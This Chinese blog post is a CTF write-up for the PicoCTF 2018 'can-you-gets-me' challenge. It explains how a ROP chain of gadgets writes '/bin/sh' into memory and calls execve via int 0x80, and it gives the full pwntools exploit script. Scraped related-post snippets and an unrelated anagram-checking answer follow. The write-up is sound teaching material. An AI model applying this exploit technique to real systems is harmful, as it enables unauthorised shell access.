非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me

最新推荐文章于 2024-09-30 23:35:28 发布
最新推荐文章于 2024-09-30 23:35:28 发布
阅读量566 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 栈溢出 ROP 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43986365/article/details/107783670
本文介绍了一种在NX保护下利用程序中的Gadget进行ROP攻击的方法,通过构造特定的exp,成功实现了execve系统调用来获取shell。文章详细解释了如何在不可执行堆栈上放置/bin/sh字符串,并利用gadget进行系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。

解题思路

查看保护

在这里插入图片描述
只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。

进入IDA查看伪代码

打开IDA,如果是第一次见这种题目就会傻眼了。
在这里插入图片描述
题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。
题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。
乍一看,好像没什么办法了,但是我们可以用程序中非常多的gadget来调用系统调用。

目标:execve(0xb, “/bin/sh”, 0, 0);

既然是系统调用,我们就很容易想到execve来getshell,而程序中也正好有这些gadgets,包括最重要的int 0x80。
而execve的结构是:

eax = 0x0b
ebx = address of "/bin/sh"
ecx = 0
edx = 0

我们就用ROPgadget来找到我们想要的gadget。

0x080b81c6 : pop eax ; ret
0x0806f02a : pop edx ; ret
0x0806f051 : pop ecx ; pop ebx ; ret
0x080549db : mov [edx], eax;ret
0x08049303 : xor eax, eax ; ret
0x0808f097 : add eax, 2 ; ret
0x0808f0b0 : add eax, 3 ; ret
0x0806cc25 : int 0x80
0x080481b2 : ret

而且我们还需要把/bin/sh放到一个地方,放在哪里合适呢?

0x08048000 0x080e9000 r-xp	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me
0x080e9000 0x080eb000 rw-p	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me   #毫无疑问,放在这里可写的地方最合适
0x080eb000 0x0810e000 rw-p	[heap]
0xf7ffa000 0xf7ffd000 r--p	[vvar]
0xf7ffd000 0xf7ffe000 r-xp	[vdso]
0xfffdd000 0xffffe000 rw-p	[stack]

我们就放在0x080e9000到0x080eb000之间就行
然后我们用我们找到的gadgets来构造exp就可以了。

完整exp:

#! /usr/bin/env python
from pwn import *

p = process('./PicoCTF_2018_can-you-gets-me')
#p = remote('node3.buuoj.cn', 28541)

writeable_memory = 0x080e9040
binsh = 0x80e9040
int80 = 0x0806cc25
ret = 0x080481b2

pop_eax = 0x080b81c6
pop_edx = 0x0806f02a
pop_ecx_ebx = 0x0806f051
mov_eax_to_edx = 0x080549db

set_eax_zero = 0x08049303
add_eax_two = 0x0808f097
add_eax_three = 0x0808f0b0

payload = ""
payload += "A"*28

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/bin"

payload += p32(mov_eax_to_edx)

writeable_memory += 4

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/sh\x00"

payload += p32(mov_eax_to_edx)

writeable_memory += 3

payload += p32(set_eax_zero)
payload += p32(pop_edx)

payload += p32(writeable_memory)    #   让字符串以空结尾
payload += p32(mov_eax_to_edx)

payload += p32(pop_ecx_ebx)
payload += p32(0)
payload += p32(binsh)

payload += p32(pop_edx)
payload += p32(0)

payload += p32(set_eax_zero)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_two)     # eax = 0x0b

payload += p32(int80)
payload += p32(ret)

p.recvuntil("GIVE ME YOUR NAME!")
p.send(payload)
p.interactive()
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
|~~~热爱生活、努力学习的小伙汁~~~|
06-15 1133
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 745
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 511
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
[BUUCTF]PWN——picoctf_2018_can_you_gets_me
mcmuyanga的博客
01-21 810
picoctf_2018_can_you_gets_me 附件 步骤: 例行检查,32位,开启了nx 本地试运行一下,看看大概的情况 32位ida载入 一开始一看发现是简单的栈溢出,直接就准备用ret2libc的方法了,但是在我找plt表找put@plt的时候我傻了,没有,双击一下puts,发现找个puts是出题人自己写的函数 想起来了之前做到的一道题目inndy_rop,那题也是没法利用got表,所以利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链,这边也尝试一下
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 470
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
picoctf_2018_can_you_gets_me
qq_62887641的博客
10-01 238
32位,只开了NX拿到这么大的程序,直接ROPchain看看果不其然然后去ida看看溢出点秒了。
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 926
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
写在Linux栈溢出尝试的黎明前
singshinesong的博客
04-18 178
当然,希望还是要有的,总有那一小撮人,不愿随波逐流,不辞昼夜地做一些“无所谓”的试验,如与哪位过客有缘,愿意指点一二,仍旧十分感激!姑且当做一次小试牛刀吧,虽中途折戟,铩羽而归,但验证了一些什么,毫不后悔,“我来了,我看见,我没有征服”O(∩_∩)O哈哈~,只得总结下经验教训供大家借鉴吧。被攻击程序一般接受用户输入,理论上不接受输入的程序无法与用户交互,这种“一刀切”后果是用户只能使用它展示的内容,无法与其交互,体验效果不佳,当然相当安全了。就这还没有调试实现成功利用呢。”,提示找不到路径,“?
csapp-深入理解计算机系统学习记录
热门推荐
mackilo的博客
02-16 1万+
文章目录csapp 学习记录一第1章:计算机系统漫游信息就是位+上下文从一个c文件,到可执行目标文件整个翻译过程分为4个阶段程序执行的过程:摩尔定律:HELLO WORLD 可执行程序的产生理解编译过程及原理的意义何在可执行程序hello在计算机上执行的过程程序执行过程中的几点启示系统的硬件组成高速缓存存储设备形成层次结构操作系统管理硬件进程线程虚拟内存并发和并行线程级并发指令级并行第2章:信息表示和处理2.1 信息存储2.1.1 十六进制表示法2.1.2 字2.1.3 数据大小2.1.4 寻址和字节顺序2
Linux进程管理(二)进程描述符task_struct
weixin_44555799的博客
09-30 967
本文linux内核版本5.10.226(只要是linux5.10.x就行,基本不会有大的出入),结构体struct task_struct定义在 include/linux/sched.h,长达732行,可见描述一个任务的复杂度之大。
picoctf_2018_leak_me
z1r0的博客
01-13 306
picoctf_2018_leak_me 查看保护 fgets可以进行溢出,v6距离s只有0x100。溢出至s,然后借助puts来打印出s from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25865) else: r = process(file_na
BUUCTF(pwn) picoctf_2018_leak_me
半岛铁盒的博客
04-06 399
这题难度不大,分析好流程就可以; name,与密码 是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...
[BUUCTF]PWN——picoctf_2018_leak_me(puts的‘\x00’绕过输出敏感数据)
mcmuyanga的博客
02-02 490
picoctf_2018_leak_me 附件 步骤 例行检查,32位,开启了nx保护 本地运行看一下大概的情况 32位ida载入 程序执行的大概流程就是先输入name,然后输入password,靶机上应该会有一个password.txt去检测是否输入是否正确,输入正确,就会调用flag函数,flag函数回将flag打印出来 参数v5(存放name)和参数s(存放flag)在栈上的位置相差不远,而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
Y_peak的博客
03-29 436
[BUUCTF-pwn]——picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。 peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。 思路 在IDA中,v6代表name s是password.距离0x100也就是256。 输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函
picoctf_2018_shellcode
z1r0的博客
12-29 1070
picoctf_2018_shellcode 查看保护 主函数不可以直接反汇编,错在call eax这里,eax拿的是ebp+var_A0这里对应的地址。发现在call vuln上面也将eax给赋了ebp+var_A0这里的地址。进vuln看一下 可以看到vuln函数中call了gets,可以写入ebp+arg_0这里的地址。而ebp+arg_0对应是地址则是main函数中ebp+var_A0中的地址。最后会call这个地址。所以写入shellcode,最后程序会自动call这里的shellcode。
bool isHeterogram(char A[]){ bool seen[26]={true}; for (int i=0; i<strlen(str);i++){ char A= str[i]; if(seen[A - 'a']){ return true ; } seen[A - 'a'] =false; } return false; } int main(){ char word[Maxlen]; printf("please enter a word or phrase:\n"); scanf("",word); if (isHeterogram(word)){ printf("\"%s\" is a heterogram\n",word); } else{ printf("\"%s\" is not a heterogram\n",word); } return 0; }帮我解释一下这段代码的意思
最新发布
03-11
<think>好的,我现在需要解释用户关于C语言编写的判断异位构词(heterogram)的程序逻辑的问题。首先,用户提到了“异位构词”,但根据提供的引用,这可能指的是字母异位词(变位词)或者同位异构字符串。但用户特别提到heterogram,这通常指每个字母只出现一次的字符串,比如“abcdefg”,但可能用户有混淆。需要先确认定义。 根据引用[1][2][3],变位词(字母异位词)是指字母排列不同但字母计数相同,比如“listen”和“silent”。而同位异构字符串如引用[2]中的例子,每个对应位置的单词是变位词。但用户的问题是关于heterogram,这可能是指另一种概念,即字符串中每个字母只出现一次。需要明确这一点。 用户可能混淆了术语。根据常规定义,heterogram是各字母不重复的单词,如“subdermatoglyphic”。而变位词是字母重新排列的单词。需要先确定用户的实际需求。但根据提供的引用,用户可能实际需要的是检查两个字符串是否为字母异位词,即变位词,如引用[1]中的问题。或者,用户可能想确认一个字符串是否是heterogram(每个字母出现一次)。 假设用户需要的是检查两个字符串是否为变位词,即字母异位词,那么程序逻辑通常涉及统计每个字符的出现次数是否相同。例如,在C语言中,可以创建一个大小为26的数组,分别统计两个字符串中各字符的频率,然后比较这两个数组是否一致。需要考虑大小写、空格等,但根据引用中的例子,可能只处理小写字母且无空格,因为引用[2]提到输入字符串由小写字母和空格组成,但题目中的变位词可能只关注字母部分,而空格作为单词分隔符。 可能的步骤: 1. 检查两个字符串长度是否相同,不同则直接返回false。 2. 统计每个字符的出现次数,使用数组。 3. 比较两个统计数组是否完全一致。 现在需要编写对应的C函数。例如: 函数is_anagram,参数为两个char指针,返回bool。首先检查长度,然后遍历两个字符串,统计每个字符出现的次数。例如,对于字符串s,每个字符s[i]对应的位置是s[i]-'a',然后在统计数组中增加计数。之后比较两个统计数组是否相同。 主函数可能读取两个字符串,调用该函数,输出结果。 需要考虑到C语言中字符串处理的方式,比如使用int数组[26]初始化为0,然后遍历每个字符,忽略非字母字符吗?或者根据题目要求处理?例如,如果题目中的字符串仅包含小写字母,则不需要处理其他情况。 例如,引用[1]中的解法1可能采用逐字检查,类似于统计计数的方法。在C语言中,可以类似实现。例如,函数实现可能如下: bool isAnagram(char* s, char* t) { if (strlen(s) != strlen(t)) return false; int count[26] = {0}; for (int i = 0; s[i] != '\0'; i++) { count[s[i] - 'a']++; count[t[i] - 'a']--; } for (int i = 0; i < 26; i++) { if (count[i] != 0) return false; } return true; } 这个函数的逻辑是:统计s中的字符增加计数,t中的字符减少计数,最后如果所有计数为0,则是变位词。这可能比两次遍历更高效。 主函数可能读取两个字符串,并调用该函数,输出是否是变位词。 现在需要解释这个函数的实现逻辑和主函数的流程。例如,主函数可能从标准输入获取两个字符串,或者通过参数传递。需要注意字符串的输入方式,避免缓冲区溢出等问题。 可能的步骤: 主函数: - 读取输入的两个字符串。 - 调用isAnagram函数。 - 输出结果。 需要处理输入,但C语言中可能需要使用fgets或者scanf等,需要注意处理空格和换行符。例如,如果输入中有空格,可能需要用gets或fgets,但要注意安全性。 另外,需要考虑是否转换大小写,例如将所有字符转为小写处理,但根据引用中的题目,可能输入都是小写字母,因此不需要转换。 综上,程序逻辑大致如上。现在需要将这些整理成中文解释,结构清晰,逐步说明函数实现和主流程。同时,根据用户的问题,需要解释C语言中的实现,可能涉及数组操作、循环等。</think>### C语言实现异位词检查程序逻辑 #### 函数实现逻辑 **异位词(字母异位词)** 指两个字符串的字符种类和数量完全相同,但排列顺序不同,例如“listen”和“silent”。实现逻辑如下: 1. **长度检查** 若两字符串长度不同,直接返回`false`,因为异位词必须长度一致[^1]。 2. **字符计数统计** - 使用长度为26的整型数组`count`,对应26个小写字母。 - 遍历第一个字符串,对每个字符`s[i]`,在`count`中对应位置(`s[i] - 'a'`)增加计数。 - 遍历第二个字符串,对每个字符`t[i]`,在`count`中对应位置减少计数[^3]。 3. **验证计数一致性** 最后检查`count`数组是否全为0。若存在非零值,说明字符数量不匹配,返回`false`;否则返回`true`。 ```c #include <stdbool.h> #include <string.h> bool is_anagram(const char *s, const char *t) { if (strlen(s) != strlen(t)) return false; int count[26] = {0}; for (int i = 0; s[i] != '\0'; i++) { count[s[i] - 'a']++; count[t[i] - 'a']--; } for (int i = 0; i < 26; i++) { if (count[i] != 0) return false; } return true; } ``` #### 主函数流程 主函数负责输入验证和结果输出: 1. **读取输入** 使用`fgets`从标准输入获取两个字符串(假设最大长度为1000)。 2. **去除换行符** 替换`fgets`捕获的换行符为字符串终止符`\0`。 3. **调用检查函数** 执行`is_anagram`函数判断是否为异位词。 4. **输出结果** 根据返回值打印“是”或“否”。 ```c #include <stdio.h> int main() { char s[1000], t[1000]; printf("输入第一个字符串:"); fgets(s, sizeof(s), stdin); s[strcspn(s, "\n")] = '\0'; // 去除换行符 printf("输入第二个字符串:"); fgets(t, sizeof(t), stdin); t[strcspn(t, "\n")] = '\0'; if (is_anagram(s, t)) { printf("是异位词\n"); } else { printf("不是异位词\n"); } return 0; } ``` #### 关键点说明 - **时间复杂度**:$O(n)$,其中$n$为字符串长度,仅需两次遍历。 - **空间复杂度**:$O(1)$,固定使用长度为26的数组。 - **局限性**:仅支持小写字母,若包含大写或特殊字符需额外处理(如转换为小写)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值